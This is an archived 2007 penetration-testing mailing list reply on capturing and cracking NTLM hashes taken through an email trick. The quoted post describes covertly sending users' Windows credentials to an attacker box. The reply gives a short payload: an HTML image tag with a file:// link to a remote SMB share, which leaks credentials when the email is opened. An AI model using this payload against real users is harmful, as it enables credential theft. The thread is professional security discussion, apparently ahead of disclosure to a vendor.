Penetration Testing mailing list archives
RE: Pass the hash
From: "Shenk, Jerry A" <jshenk () decommunications com>
Date: Fri, 16 Nov 2007 07:38:12 -0500
Send the hash to a machine that is only capable of LM authentication and then sniff that traffic. I've done that with an embedded image tag in an e-mail like <img src="file://123.123.123.123/someshare/dot.gif"> or something like that. -----Original Message----- From: listbounce () securityfocus com [mailto:listbounce () securityfocus com] On Behalf Of me Sent: Thursday, November 15, 2007 5:15 PM To: pen-test () securityfocus com Subject: Pass the hash I have an email hack that sends the Windows credentials, without the user's knowledge or consent, to my box - which is running CAIN. No machine in my shop will send (downgrade authentication) LM or NTLMv1 -- only NTLMv2 -- which is NTLMSSP . Using CAIN I can get the suite of NTLMSSP hashes but I cannot pass them on or crack them via brute force. Since these hashes are not the same as the hashes from the SAM - I cannot pass them directly to a RAINBOW NTLM table attack. Before I turn over the email hack to the email vendor, I would like very much to have a POC that either passes the hash or a better cracker than using a dictionary. It seems to me that the only viable hack is to somehow create a MITM situation where the authentication from my email hack is used to access some network resource (share) on a target machine where I know the email victim can access the resource via these credentials. I am hoping Metasploit or CAIN will do this one day and I know that Metasploit will pass the hash when it is not an NTLMv2 hash. Any other ideas that will leverage the hashes that I can gather - I have gathered my own hashes and verified that a CAIN dictionary attack will accurately match up a password to a hash (in other words the CAIN dictionary cracker works fine). I think that by using a very large dictionary and using all of the CAIN dictionary options I could probably crack 2-3 passwords from 200 hashes. thanks ________________________________________________________________________ ____________ Be a better sports nut! Let your teams follow you with Yahoo Mobile. Try it now. http://mobile.yahoo.com/sports;_ylt=At9_qDKvtAbMuh1G1SQtBI7ntAcJ ------------------------------------------------------------------------ This list is sponsored by: Cenzic Need to secure your web apps NOW? Cenzic finds more, "real" vulnerabilities fast. Click to try it, buy it or download a solution FREE today! http://www.cenzic.com/downloads ------------------------------------------------------------------------ **DISCLAIMER This e-mail message and any files transmitted with it are intended for the use of the individual or entity to which they are addressed and may contain information that is privileged, proprietary and confidential. If you are not the intended recipient, you may not use, copy or disclose to anyone the message or any information contained in the message. If you have received this communication in error, please notify the sender and delete this e-mail message. The contents do not represent the opinion of D&E except to the extent that it relates to their official business. ------------------------------------------------------------------------ This list is sponsored by: Cenzic Need to secure your web apps NOW? Cenzic finds more, "real" vulnerabilities fast. Click to try it, buy it or download a solution FREE today! http://www.cenzic.com/downloads ------------------------------------------------------------------------
Current thread:
- Pass the hash me (Nov 15)
- RE: Pass the hash dan (Nov 16)
- RE: Pass the hash Shenk, Jerry A (Nov 16)
- RE: Pass the hash jmk (Nov 18)